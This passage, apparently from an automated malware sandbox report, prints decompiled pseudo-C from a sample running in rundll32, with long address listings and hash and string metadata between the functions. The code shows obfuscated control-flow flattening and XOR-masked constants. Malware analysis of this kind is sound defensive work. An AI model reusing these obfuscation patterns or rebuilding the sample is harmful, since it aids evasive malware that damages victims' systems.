								_t531 = E0082B6CE(_v1664, _v1648, _t550, _v1708, _v1592, _v1600, _v1716, _v1656, _v1564, _v1608,  &_v1560, 2 + E0082AE68(_v1664, _v1724, _v1672,  &_v1560, _v1680) * 2);
								_t631 =  &(_t631[0xd]);
								__eflags = _t531;
								_t625 = 0xd26443e;
								_t471 = _t531 == 0;
								__eflags = _t471;
								_v1568 = 0 | _t471;
								goto L17;
							} else {
								if(_t625 == 0x971d92c) {
									_push(_t568);
									E0081DE7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
									_t631 =  &(_t631[7]);
									_t625 = 0xf5a31c5;
									goto L1;
								} else {
									if(_t625 == 0x9b520f4) {
										_t552 =  *0x1002520c + 0x220;
										while(1) {
											__eflags =  *_t552 - _t568;
											if(__eflags == 0) {
												break;
											}
											_t552 = _t552 + 2;
											__eflags = _t552;
										}
										_t550 = _t552 + 2;
										_t625 = 0xaa323c9;
										goto L2;
									} else {
										if(_t625 == 0xaa323c9) {
											_push(_v1636);
											_push(_v1604);
											_t572 = _v1580;
											_push(0x1000118c);
											__eflags = E00817B86(_v1756, _v1668, _v1580,  &_v1564, _v1588, E00819F66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
											E0081A203(_v1740, _v1748, _v1660, _t534);
											_t631 =  &(_t631[0x12]);
											L17:
											_t526 = 0xdd30c3;
											_t568 = 0x5c;
											goto L18;
										} else {
											if(_t625 == 0xd26443e) {
												E00816EF8(_v1700, _v1692, _v1564, _v1632, _v1640);
											} else {
												_t640 = _t625 - 0xf5a31c5;
												if(_t625 != 0xf5a31c5) {
													goto L18;
												} else {
													_push(_v1728);
													_push(_v1752);
													_push(0x100010fc);
													_t540 = E00819F66(_v1712, _v1620, _t640);
													E0082BA6E( &_v1040, _t640);
													_t427 =  &_v1684; // 0xe63f3d4e
													E0082B1B5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612,  *0x1002520c + 0x220, _v1624, _v1688,  *0x1002520c + 8,  &_v1040,  &_v520, _t540);
													E0081A203(_v1676, _v1720, _v1652, _t540);
													_t631 =  &(_t631[0x10]);
													_t625 = 0x9b520f4;
													while(1) {
														L1:
														_t568 = 0x5c;
														L2:
														_t526 = 0xdd30c3;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L21:
							return _v1568;
							L18:
							__eflags = _t625 - 0x546d466;
						} while (__eflags != 0);
						goto L21;
					}
				}
			}
















































































                                                                                                                      0x0082ccd7
                                                                                                                      0x0082ccdd
                                                                                                                      0x0082ccec
                                                                                                                      0x0082cd00
                                                                                                                      0x0082cd05
                                                                                                                      0x0082cd0e
                                                                                                                      0x0082cd19
                                                                                                                      0x0082cd1e
                                                                                                                      0x0082cd30
                                                                                                                      0x0082cd35
                                                                                                                      0x0082cd3e
                                                                                                                      0x0082cd49
                                                                                                                      0x0082cd5b
                                                                                                                      0x0082cd60
                                                                                                                      0x0082cd69
                                                                                                                      0x0082cd74
                                                                                                                      0x0082cd7f
                                                                                                                      0x0082cd87
                                                                                                                      0x0082cd8b
                                                                                                                      0x0082cd8e
                                                                                                                      0x0082cd92
                                                                                                                      0x0082cd9a
                                                                                                                      0x0082cda7
                                                                                                                      0x0082cdaf
                                                                                                                      0x0082cdb7
                                                                                                                      0x0082cdbc
                                                                                                                      0x0082cdc4
                                                                                                                      0x0082cdcf
                                                                                                                      0x0082cdd7
                                                                                                                      0x0082cde2
                                                                                                                      0x0082cdef
                                                                                                                      0x0082cdf3
                                                                                                                      0x0082cdfb
                                                                                                                      0x0082ce00
                                                                                                                      0x0082ce08
                                                                                                                      0x0082ce13
                                                                                                                      0x0082ce26
                                                                                                                      0x0082ce2d
                                                                                                                      0x0082ce38
                                                                                                                      0x0082ce40
                                                                                                                      0x0082ce48
                                                                                                                      0x0082ce55
                                                                                                                      0x0082ce59
                                                                                                                      0x0082ce61
                                                                                                                      0x0082ce6c
                                                                                                                      0x0082ce74
                                                                                                                      0x0082ce7f
                                                                                                                      0x0082ce8c
                                                                                                                      0x0082ce90
                                                                                                                      0x0082ce95
                                                                                                                      0x0082ce9a
                                                                                                                      0x0082cea2
                                                                                                                      0x0082ceaf
                                                                                                                      0x0082ceb8
                                                                                                                      0x0082cebc
                                                                                                                      0x0082cec3
                                                                                                                      0x0082cecb
                                                                                                                      0x0082ced3
                                                                                                                      0x0082cedb
                                                                                                                      0x0082cee0
                                                                                                                      0x0082cee5
                                                                                                                      0x0082ceed
                                                                                                                      0x0082cefb
                                                                                                                      0x0082cf00
                                                                                                                      0x0082cf04
                                                                                                                      0x0082cf0c
                                                                                                                      0x0082cf14
                                                                                                                      0x0082cf1f
                                                                                                                      0x0082cf2a
                                                                                                                      0x0082cf35
                                                                                                                      0x0082cf40
                                                                                                                      0x0082cf4b
                                                                                                                      0x0082cf56
                                                                                                                      0x0082cf61
                                                                                                                      0x0082cf6c
                                                                                                                      0x0082cf74
                                                                                                                      0x0082cf7f
                                                                                                                      0x0082cf87
                                                                                                                      0x0082cf8f
                                                                                                                      0x0082cf97
                                                                                                                      0x0082cf9f
                                                                                                                      0x0082cfa7
                                                                                                                      0x0082cfb6
                                                                                                                      0x0082cfb9
                                                                                                                      0x0082cfba
                                                                                                                      0x0082cfbe
                                                                                                                      0x0082cfc6
                                                                                                                      0x0082cfd6
                                                                                                                      0x0082cfe2
                                                                                                                      0x0082cfee
                                                                                                                      0x0082cff4
                                                                                                                      0x0082cffc
                                                                                                                      0x0082d007
                                                                                                                      0x0082d012
                                                                                                                      0x0082d019
                                                                                                                      0x0082d024
                                                                                                                      0x0082d02f
                                                                                                                      0x0082d03a
                                                                                                                      0x0082d045
                                                                                                                      0x0082d051
                                                                                                                      0x0082d054
                                                                                                                      0x0082d058
                                                                                                                      0x0082d05d
                                                                                                                      0x0082d065
                                                                                                                      0x0082d070
                                                                                                                      0x0082d07b
                                                                                                                      0x0082d086
                                                                                                                      0x0082d091
                                                                                                                      0x0082d09c
                                                                                                                      0x0082d0a7
                                                                                                                      0x0082d0b2
                                                                                                                      0x0082d0ba
                                                                                                                      0x0082d0c2
                                                                                                                      0x0082d0ca
                                                                                                                      0x0082d0d2
                                                                                                                      0x0082d0da
                                                                                                                      0x0082d0e7
                                                                                                                      0x0082d0f2
                                                                                                                      0x0082d0fd
                                                                                                                      0x0082d108
                                                                                                                      0x0082d113
                                                                                                                      0x0082d11e
                                                                                                                      0x0082d126
                                                                                                                      0x0082d12b
                                                                                                                      0x0082d130
                                                                                                                      0x0082d135
                                                                                                                      0x0082d13d
                                                                                                                      0x0082d145
                                                                                                                      0x0082d14d
                                                                                                                      0x0082d155
                                                                                                                      0x0082d15d
                                                                                                                      0x0082d165
                                                                                                                      0x0082d16d
                                                                                                                      0x0082d172
                                                                                                                      0x0082d17a
                                                                                                                      0x0082d17e
                                                                                                                      0x0082d186
                                                                                                                      0x0082d18e
                                                                                                                      0x0082d193
                                                                                                                      0x0082d19b
                                                                                                                      0x0082d1a3
                                                                                                                      0x0082d1ab
                                                                                                                      0x0082d1b9
                                                                                                                      0x0082d1be
                                                                                                                      0x0082d1c8
                                                                                                                      0x0082d1cd
                                                                                                                      0x0082d1d8
                                                                                                                      0x0082d1db
                                                                                                                      0x0082d1df
                                                                                                                      0x0082d1e7
                                                                                                                      0x0082d1ef
                                                                                                                      0x0082d1fd
                                                                                                                      0x0082d1fe
                                                                                                                      0x0082d204
                                                                                                                      0x0082d20c
                                                                                                                      0x0082d214
                                                                                                                      0x0082d21c
                                                                                                                      0x0082d224
                                                                                                                      0x0082d234
                                                                                                                      0x0082d238
                                                                                                                      0x0082d240
                                                                                                                      0x0082d244
                                                                                                                      0x0082d24c
                                                                                                                      0x0082d254
                                                                                                                      0x0082d259
                                                                                                                      0x0082d261
                                                                                                                      0x0082d269
                                                                                                                      0x0082d271
                                                                                                                      0x0082d276
                                                                                                                      0x0082d27e
                                                                                                                      0x0082d286
                                                                                                                      0x0082d291
                                                                                                                      0x0082d299
                                                                                                                      0x0082d2a4
                                                                                                                      0x0082d2b1
                                                                                                                      0x0082d2bd
                                                                                                                      0x0082d2c2
                                                                                                                      0x0082d2c9
                                                                                                                      0x0082d2d8
                                                                                                                      0x0082d2dd
                                                                                                                      0x0082d2e8
                                                                                                                      0x0082d2eb
                                                                                                                      0x0082d2ef
                                                                                                                      0x0082d2f7
                                                                                                                      0x0082d302
                                                                                                                      0x0082d30d
                                                                                                                      0x0082d318
                                                                                                                      0x0082d323
                                                                                                                      0x0082d32e
                                                                                                                      0x0082d339
                                                                                                                      0x0082d349
                                                                                                                      0x0082d34d
                                                                                                                      0x0082d351
                                                                                                                      0x0082d359
                                                                                                                      0x0082d364
                                                                                                                      0x0082d36f
                                                                                                                      0x0082d37a
                                                                                                                      0x0082d382
                                                                                                                      0x0082d38a
                                                                                                                      0x0082d396
                                                                                                                      0x0082d39b
                                                                                                                      0x0082d39f
                                                                                                                      0x0082d3a7
                                                                                                                      0x0082d3af
                                                                                                                      0x0082d3b7
                                                                                                                      0x0082d3bf
                                                                                                                      0x0082d3c7
                                                                                                                      0x0082d3db
                                                                                                                      0x0082d3e2
                                                                                                                      0x0082d3ea
                                                                                                                      0x0082d3f5
                                                                                                                      0x0082d400
                                                                                                                      0x0082d40b
                                                                                                                      0x0082d416
                                                                                                                      0x0082d421
                                                                                                                      0x0082d421
                                                                                                                      0x0082d423
                                                                                                                      0x0082d424
                                                                                                                      0x0082d424
                                                                                                                      0x0082d424
                                                                                                                      0x0082d429
                                                                                                                      0x0082d429
                                                                                                                      0x0082d42b
                                                                                                                      0x0082d65d
                                                                                                                      0x0082d664
                                                                                                                      0x0082d667
                                                                                                                      0x0082d669
                                                                                                                      0x0082d66e
                                                                                                                      0x0082d66e
                                                                                                                      0x0082d671
                                                                                                                      0x00000000
                                                                                                                      0x0082d431
                                                                                                                      0x0082d437
                                                                                                                      0x0082d5c5
                                                                                                                      0x0082d5eb
                                                                                                                      0x0082d5f0
                                                                                                                      0x0082d5f3
                                                                                                                      0x00000000
                                                                                                                      0x0082d43d
                                                                                                                      0x0082d443
                                                                                                                      0x0082d5ab
                                                                                                                      0x0082d5b6
                                                                                                                      0x0082d5b6
                                                                                                                      0x0082d5b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082d5b3
                                                                                                                      0x0082d5b3
                                                                                                                      0x0082d5b3
                                                                                                                      0x0082d5bb
                                                                                                                      0x0082d5be
                                                                                                                      0x00000000
                                                                                                                      0x0082d449
                                                                                                                      0x0082d44b
                                                                                                                      0x0082d513
                                                                                                                      0x0082d51a
                                                                                                                      0x0082d525
                                                                                                                      0x0082d52c
                                                                                                                      0x0082d579
                                                                                                                      0x0082d595
                                                                                                                      0x0082d598
                                                                                                                      0x0082d59d
                                                                                                                      0x0082d678
                                                                                                                      0x0082d67a
                                                                                                                      0x0082d67f
                                                                                                                      0x00000000
                                                                                                                      0x0082d451
                                                                                                                      0x0082d457
                                                                                                                      0x0082d6ab
                                                                                                                      0x0082d45d
                                                                                                                      0x0082d45d
                                                                                                                      0x0082d463
                                                                                                                      0x00000000
                                                                                                                      0x0082d469
                                                                                                                      0x0082d469
                                                                                                                      0x0082d46d
                                                                                                                      0x0082d47c
                                                                                                                      0x0082d481
                                                                                                                      0x0082d48f
                                                                                                                      0x0082d4de
                                                                                                                      0x0082d4e9
                                                                                                                      0x0082d501
                                                                                                                      0x0082d506
                                                                                                                      0x0082d509
                                                                                                                      0x0082d421
                                                                                                                      0x0082d421
                                                                                                                      0x0082d423
                                                                                                                      0x0082d424
                                                                                                                      0x0082d424
                                                                                                                      0x00000000
                                                                                                                      0x0082d424
                                                                                                                      0x0082d421
                                                                                                                      0x0082d463
                                                                                                                      0x0082d457
                                                                                                                      0x0082d44b
                                                                                                                      0x0082d443
                                                                                                                      0x0082d437
                                                                                                                      0x0082d6b3
                                                                                                                      0x0082d6c4
                                                                                                                      0x0082d680
                                                                                                                      0x0082d680
                                                                                                                      0x0082d680
                                                                                                                      0x00000000
                                                                                                                      0x0082d68c
                                                                                                                      0x0082d424

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 171d9a83f24d20673f144a38ed254fce88a0b042ed2d3d1c87c9090dd588524e
                                                                                                                      • Instruction ID: 3b315807bb8265a75d1d92a10df89dbfae9e42a3d743461de3e6d7cd7235e282
                                                                                                                      • Opcode Fuzzy Hash: 171d9a83f24d20673f144a38ed254fce88a0b042ed2d3d1c87c9090dd588524e
                                                                                                                      • Instruction Fuzzy Hash: D8320272509380DFE368CF65D94AA8FBBE2FBC4318F10891DE19986260D7B59949CF07
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0082E294 Relevance: 14.2, Strings: 11, Instructions: 427COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0082E294(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr _t445;
				void* _t448;
				intOrPtr _t453;
				signed int _t467;
				intOrPtr _t470;
				intOrPtr _t471;
				void* _t505;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr* _t521;
				signed int _t524;
				intOrPtr _t529;
				signed int* _t531;
				void* _t533;

				_t471 = __ecx;
				_push(_a8);
				_v104 = __ecx;
				_push(_a4);
				_v12 = __edx;
				_push(__edx);
				_push(__ecx);
				E0081C325(__edx);
				_v124 = 0x410507;
				_t531 =  &(( &_v192)[4]);
				_v124 = _v124 ^ 0x83a2264d;
				_v124 = _v124 >> 0xa;
				_t470 = 0;
				_t529 = 0;
				_t512 = 0x17;
				_t524 = 0xd582a45;
				_v124 = _v124 * 3;
				_v124 = _v124 ^ 0x0062ea59;
				_v164 = 0x8ee5f4;
				_v164 = _v164 << 0xd;
				_v164 = _v164 ^ 0xc2bd4067;
				_v164 = _v164 + 0xffffa455;
				_v164 = _v164 ^ 0x1e0364bd;
				_v116 = 0xd0c3db;
				_v116 = _v116 + 0x7244;
				_v116 = _v116 + 0xffff5950;
				_v116 = _v116 * 0x7d;
				_v116 = _v116 ^ 0x65d60932;
				_v76 = 0x69c3d0;
				_v76 = _v76 + 0x2803;
				_v76 = _v76 ^ 0x0109b4af;
				_v76 = _v76 ^ 0x016cb6ed;
				_v84 = 0x591f9b;
				_v84 = _v84 ^ 0x136c22a2;
				_v84 = _v84 + 0xbc03;
				_v84 = _v84 ^ 0x133eabdb;
				_v40 = 0x32843;
				_v40 = _v40 + 0x6836;
				_v40 = _v40 ^ 0x000a5f7a;
				_v96 = 0x3c9c05;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 ^ 0xb1c6e809;
				_v96 = _v96 ^ 0xb7e34fe8;
				_v56 = 0xda9312;
				_v56 = _v56 / _t512;
				_v56 = _v56 ^ 0x0000b271;
				_v132 = 0xda0ea8;
				_v132 = _v132 | 0xaeef9bf7;
				_t513 = 0x71;
				_v132 = _v132 / _t513;
				_v132 = _v132 ^ 0x01890540;
				_v44 = 0x61f218;
				_v44 = _v44 + 0xffff41d7;
				_v44 = _v44 ^ 0x006fe265;
				_v144 = 0x306d33;
				_v144 = _v144 + 0xfffff564;
				_v144 = _v144 * 0x6e;
				_v144 = _v144 + 0xffff469c;
				_v144 = _v144 ^ 0x14c9b51d;
				_v52 = 0x70de34;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x038f9e4d;
				_v36 = 0x6cb1ac;
				_v36 = _v36 + 0x1a54;
				_v36 = _v36 ^ 0x00646b3f;
				_v152 = 0x976d54;
				_v152 = _v152 ^ 0x53b4556c;
				_v152 = _v152 ^ 0x5116bac9;
				_v152 = _v152 ^ 0x4d195c93;
				_v152 = _v152 ^ 0x4f27d4c2;
				_v28 = 0x414a88;
				_v28 = _v28 | 0x717fc69d;
				_v28 = _v28 ^ 0x71799fc5;
				_v160 = 0xc7706;
				_v160 = _v160 + 0xc91f;
				_v160 = _v160 | 0xaa894ceb;
				_v160 = _v160 + 0xffffb57b;
				_v160 = _v160 ^ 0xaa88db85;
				_v168 = 0x67f23c;
				_v168 = _v168 ^ 0x8eced2dd;
				_v168 = _v168 ^ 0x27c733d3;
				_v168 = _v168 ^ 0x736125b9;
				_v168 = _v168 ^ 0xda0ef7f2;
				_v176 = 0x85bb3;
				_v176 = _v176 | 0x89ba1603;
				_v176 = _v176 >> 8;
				_t514 = 0x6a;
				_v176 = _v176 / _t514;
				_v176 = _v176 ^ 0x0009ce33;
				_v136 = 0xb0a921;
				_v136 = _v136 ^ 0x2367151f;
				_v136 = _v136 ^ 0x64865221;
				_t515 = 0x35;
				_v136 = _v136 * 0x3f;
				_v136 = _v136 ^ 0x8d2b953d;
				_v148 = 0x2df722;
				_v148 = _v148 * 0x30;
				_v148 = _v148 + 0xd30d;
				_v148 = _v148 | 0x68c8f2ae;
				_v148 = _v148 ^ 0x68db5c3d;
				_v92 = 0xa4f97a;
				_v92 = _v92 ^ 0x325a0e28;
				_v92 = _v92 + 0x57de;
				_v92 = _v92 ^ 0x32f51d21;
				_v32 = 0xa83f00;
				_v32 = _v32 + 0xffff47e2;
				_v32 = _v32 ^ 0x00a2bde7;
				_v156 = 0xe5ea35;
				_t178 =  &_v156; // 0xe5ea35
				_v156 =  *_t178 / _t515;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0x3621;
				_v156 = _v156 ^ 0x008c998d;
				_v180 = 0x37bb8c;
				_v180 = _v180 ^ 0x8c6790c9;
				_t516 = 0x3c;
				_v180 = _v180 * 0x44;
				_v180 = _v180 | 0x3ef8ecb7;
				_v180 = _v180 ^ 0x7ff3e314;
				_v88 = 0x10d686;
				_v88 = _v88 + 0xffff44b6;
				_v88 = _v88 / _t516;
				_v88 = _v88 ^ 0x000573bd;
				_v64 = 0x2cf4a8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 + 0xffff4c9b;
				_v64 = _v64 ^ 0x67a6f27b;
				_v188 = 0x434d7c;
				_t218 =  &_v188; // 0x434d7c
				_v188 =  *_t218 * 0x14;
				_v188 = _v188 + 0xffff53dc;
				_v188 = _v188 * 0x58;
				_v188 = _v188 ^ 0xce78d82e;
				_v48 = 0x39a498;
				_v48 = _v48 + 0xd90b;
				_v48 = _v48 ^ 0x00328937;
				_v172 = 0x329194;
				_v172 = _v172 + 0x15c2;
				_v172 = _v172 ^ 0x8846dc1f;
				_v172 = _v172 + 0x561;
				_v172 = _v172 ^ 0x8878b13b;
				_v140 = 0x921bc4;
				_v140 = _v140 | 0xc689e64a;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x67a6be9d;
				_v140 = _v140 ^ 0x67a0761b;
				_v72 = 0xa3a418;
				_t517 = 0x26;
				_v72 = _v72 * 0x26;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0002c06b;
				_v108 = 0xd1ae1a;
				_v108 = _v108 ^ 0x567f87f9;
				_v108 = _v108 | 0x0eb5e220;
				_v108 = _v108 ^ 0x558f672f;
				_v108 = _v108 ^ 0x0b3c3f9a;
				_v80 = 0x5d29a8;
				_v80 = _v80 | 0x5a2f4123;
				_v80 = _v80 / _t517;
				_v80 = _v80 ^ 0x0265326d;
				_v184 = 0x50dc21;
				_v184 = _v184 + 0xffff863b;
				_v184 = _v184 + 0xffff7ebb;
				_v184 = _v184 + 0x5f54;
				_v184 = _v184 ^ 0x005a5f37;
				_v68 = 0x13fcd3;
				_v68 = _v68 + 0x7ca8;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x000ac947;
				_v24 = 0xc2d10f;
				_v24 = _v24 + 0xffff657d;
				_v24 = _v24 ^ 0x00c52471;
				_v192 = 0x48c156;
				_v192 = _v192 >> 4;
				_t518 = 0x2f;
				_v192 = _v192 * 0x2f;
				_v192 = _v192 + 0xffffa98f;
				_v192 = _v192 ^ 0x00d9c1bc;
				_v112 = 0xb16c9;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 << 0x10;
				_v112 = _v112 / _t518;
				_v112 = _v112 ^ 0x00028b59;
				_v120 = 0x2563ad;
				_t519 = 0x30;
				_v120 = _v120 / _t519;
				_v120 = _v120 + 0xffffe9b6;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x000e86e4;
				_v60 = 0x629492;
				_t520 = 0x32;
				_v60 = _v60 / _t520;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x07e42de9;
				_v128 = 0x197221;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 << 1;
				_v128 = _v128 * 0x2e;
				_v128 = _v128 ^ 0x0004057d;
				_t521 = _v16;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t533 = _t524 - 0x94e79b7;
							if(_t533 > 0) {
								break;
							}
							if(_t533 == 0) {
								_push(_t471);
								_push(_t471);
								_t445 = E00822912(0x20000);
								_t470 = _t445;
								if(_t470 != 0) {
									_t524 = 0x4150ae2;
									goto L12;
								}
							} else {
								if(_t524 == 0x35d4444) {
									_t453 = E00812296(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
									_t471 = _v104;
									_t531 =  &(_t531[5]);
									_v20 = _t453;
									_t505 = 0x812254d;
									_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
									continue;
								} else {
									if(_t524 == 0x4150ae2) {
										_push(_t471);
										_push(_t471);
										_t529 = E00822912(0x2000);
										_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
										goto L12;
									} else {
										if(_t524 == 0x4f6d4ac) {
											_t521 = _t521 + 0x2c;
											asm("sbb esi, esi");
											_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
											continue;
										} else {
											if(_t524 == 0x53e4020) {
												E008280D6(_v164, _t471, _t529, _v108, _v80);
												_t531 =  &(_t531[3]);
												L11:
												_t524 = 0xd965e23;
												L12:
												L13:
												_t471 = _v104;
												goto L1;
											} else {
												if(_t524 == _t505) {
													E008189C9(_t529,  &_v8, _v180, _v124, _v20, _v88, _v64, _v188);
													_t524 =  !=  ? 0x53e4020 : 0x4f6d4ac;
													E0082DA89(_v48, _v172, _v140, _v20, _v72);
													_t531 =  &(_t531[0xa]);
													L28:
													_t471 = _v104;
													_t505 = 0x812254d;
												}
												goto L29;
											}
										}
									}
								}
							}
							goto L30;
						}
						if(_t524 == 0x98aa4b1) {
							E00815CDE(_v112, _v120, _v60, _v128, _t470);
							_t531 =  &(_t531[3]);
							_t524 = 0x34e8be;
							goto L28;
						} else {
							if(_t524 == 0xd2f1d9f) {
								_t473 = _v44;
								_t448 = E0082DDE9(_v44, _v144, _v52,  &_v16, _v36, _v152,  &_v4, _v12, _v28, _t471, _t471, _v160, _t471, _t471, _v168, _t471, _v176, _t471, _t470);
								_t531 =  &(_t531[0x11]);
								if(_t448 == 0) {
									goto L11;
								} else {
									_t467 = E00814EE2(_t473);
									_t524 = 0x35d4444;
									_v100 = _v16 * 0x2c + _t470;
									_t521 =  >=  ? _t470 : (_t467 & 0x0000001f) * 0x2c + _t470;
									goto L13;
								}
								L31:
							} else {
								if(_t524 == 0xd582a45) {
									_t524 = 0x94e79b7;
									goto L2;
								} else {
									if(_t524 != 0xd965e23) {
										goto L29;
									} else {
										E00815CDE(_v184, _v68, _v24, _v192, _t529);
										_t531 =  &(_t531[3]);
										_t524 = 0x98aa4b1;
										goto L12;
									}
								}
							}
						}
						break;
						L29:
						_t445 = _v100;
					} while (_t524 != 0x34e8be);
					L30:
					return _t445;
					goto L31;
				}
			}








































































                                                                                                                      0x0082e294
                                                                                                                      0x0082e29e
                                                                                                                      0x0082e2a7
                                                                                                                      0x0082e2ab
                                                                                                                      0x0082e2b2
                                                                                                                      0x0082e2b9
                                                                                                                      0x0082e2ba
                                                                                                                      0x0082e2bb
                                                                                                                      0x0082e2c0
                                                                                                                      0x0082e2c8
                                                                                                                      0x0082e2cb
                                                                                                                      0x0082e2d5
                                                                                                                      0x0082e2da
                                                                                                                      0x0082e2e1
                                                                                                                      0x0082e2e5
                                                                                                                      0x0082e2e8
                                                                                                                      0x0082e2ed
                                                                                                                      0x0082e2f1
                                                                                                                      0x0082e2f9
                                                                                                                      0x0082e301
                                                                                                                      0x0082e306
                                                                                                                      0x0082e30e
                                                                                                                      0x0082e316
                                                                                                                      0x0082e31e
                                                                                                                      0x0082e326
                                                                                                                      0x0082e32e
                                                                                                                      0x0082e33b
                                                                                                                      0x0082e33f
                                                                                                                      0x0082e347
                                                                                                                      0x0082e352
                                                                                                                      0x0082e35d
                                                                                                                      0x0082e368
                                                                                                                      0x0082e373
                                                                                                                      0x0082e37e
                                                                                                                      0x0082e389
                                                                                                                      0x0082e394
                                                                                                                      0x0082e39f
                                                                                                                      0x0082e3aa
                                                                                                                      0x0082e3b5
                                                                                                                      0x0082e3c0
                                                                                                                      0x0082e3cd
                                                                                                                      0x0082e3d1
                                                                                                                      0x0082e3d9
                                                                                                                      0x0082e3e1
                                                                                                                      0x0082e3f7
                                                                                                                      0x0082e3fe
                                                                                                                      0x0082e409
                                                                                                                      0x0082e411
                                                                                                                      0x0082e41d
                                                                                                                      0x0082e420
                                                                                                                      0x0082e424
                                                                                                                      0x0082e42c
                                                                                                                      0x0082e437
                                                                                                                      0x0082e442
                                                                                                                      0x0082e44d
                                                                                                                      0x0082e455
                                                                                                                      0x0082e462
                                                                                                                      0x0082e466
                                                                                                                      0x0082e46e
                                                                                                                      0x0082e476
                                                                                                                      0x0082e481
                                                                                                                      0x0082e489
                                                                                                                      0x0082e494
                                                                                                                      0x0082e49f
                                                                                                                      0x0082e4aa
                                                                                                                      0x0082e4b5
                                                                                                                      0x0082e4bf
                                                                                                                      0x0082e4c7
                                                                                                                      0x0082e4cf
                                                                                                                      0x0082e4d7
                                                                                                                      0x0082e4df
                                                                                                                      0x0082e4ea
                                                                                                                      0x0082e4f5
                                                                                                                      0x0082e500
                                                                                                                      0x0082e508
                                                                                                                      0x0082e510
                                                                                                                      0x0082e518
                                                                                                                      0x0082e520
                                                                                                                      0x0082e528
                                                                                                                      0x0082e530
                                                                                                                      0x0082e538
                                                                                                                      0x0082e540
                                                                                                                      0x0082e548
                                                                                                                      0x0082e550
                                                                                                                      0x0082e558
                                                                                                                      0x0082e560
                                                                                                                      0x0082e56b
                                                                                                                      0x0082e570
                                                                                                                      0x0082e576
                                                                                                                      0x0082e57e
                                                                                                                      0x0082e586
                                                                                                                      0x0082e58e
                                                                                                                      0x0082e59b
                                                                                                                      0x0082e59e
                                                                                                                      0x0082e5a2
                                                                                                                      0x0082e5aa
                                                                                                                      0x0082e5b7
                                                                                                                      0x0082e5bb
                                                                                                                      0x0082e5c3
                                                                                                                      0x0082e5cb
                                                                                                                      0x0082e5d3
                                                                                                                      0x0082e5db
                                                                                                                      0x0082e5e3
                                                                                                                      0x0082e5eb
                                                                                                                      0x0082e5f3
                                                                                                                      0x0082e5fe
                                                                                                                      0x0082e609
                                                                                                                      0x0082e614
                                                                                                                      0x0082e61c
                                                                                                                      0x0082e624
                                                                                                                      0x0082e628
                                                                                                                      0x0082e62d
                                                                                                                      0x0082e635
                                                                                                                      0x0082e63d
                                                                                                                      0x0082e645
                                                                                                                      0x0082e652
                                                                                                                      0x0082e653
                                                                                                                      0x0082e657
                                                                                                                      0x0082e65f
                                                                                                                      0x0082e667
                                                                                                                      0x0082e66f
                                                                                                                      0x0082e67d
                                                                                                                      0x0082e681
                                                                                                                      0x0082e689
                                                                                                                      0x0082e694
                                                                                                                      0x0082e69c
                                                                                                                      0x0082e6a7
                                                                                                                      0x0082e6b2
                                                                                                                      0x0082e6ba
                                                                                                                      0x0082e6bf
                                                                                                                      0x0082e6c3
                                                                                                                      0x0082e6d0
                                                                                                                      0x0082e6d6
                                                                                                                      0x0082e6de
                                                                                                                      0x0082e6e9
                                                                                                                      0x0082e6f4
                                                                                                                      0x0082e6ff
                                                                                                                      0x0082e707
                                                                                                                      0x0082e70f
                                                                                                                      0x0082e717
                                                                                                                      0x0082e71f
                                                                                                                      0x0082e727
                                                                                                                      0x0082e72f
                                                                                                                      0x0082e737
                                                                                                                      0x0082e73c
                                                                                                                      0x0082e744
